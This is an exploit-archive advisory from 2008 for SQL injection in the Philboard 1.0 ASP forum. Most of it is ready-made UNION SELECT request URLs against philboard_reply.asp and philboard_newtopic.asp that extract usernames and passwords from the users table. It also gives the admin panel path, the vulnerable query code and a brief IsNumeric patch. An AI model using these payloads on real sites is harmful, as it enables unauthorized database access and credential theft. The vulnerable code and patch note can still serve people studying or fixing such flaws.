[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection Vulnerability
# Published : 2008-04-20
# Author : U238
# Previous Title : TR News 2.1 (nb) Remote SQL Injection Vulnerability
# Next Title : HostDirectory Pro Insecure Cookie Handling Vulnerability
Philboard W1L3D4 v1.0 Multiple SQL ?°njection Vulnerable
Author : U238
mail : setuid.noexec0x1[aq]hotmail[dot]com
webpage: http://noexec.blogspot.com
Script : http://www.aspindir.com/Goster/4703
Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html
-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_
[0x1] Exploit:
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users
*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users
-----------------------
http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users
http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users
-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-
[0x2] Admin Panel
target/philboard/philboard_admin.asp
[0x3] Error File :
philboard_newtopic.asp
philboard_reply.asp
[0x3] Error Code :
id = Request.QueryString("id")
recordnum = Request.QueryString("recordnum")
sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id
[-] Patched ? [-]
id = Request.QueryString("id")
IF Not IsNumeric(request.querystring("id")) THEN
Response.write "sql injection mu ar?±yon yawrucum,anam? !!"
Response.End
END IF
* This Code , application make to included error file..
------------------------------
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak
[0x5] U238 | Web - Designer Developer Solutions
-----------------------------
# www.Syue.com [2008-04-20]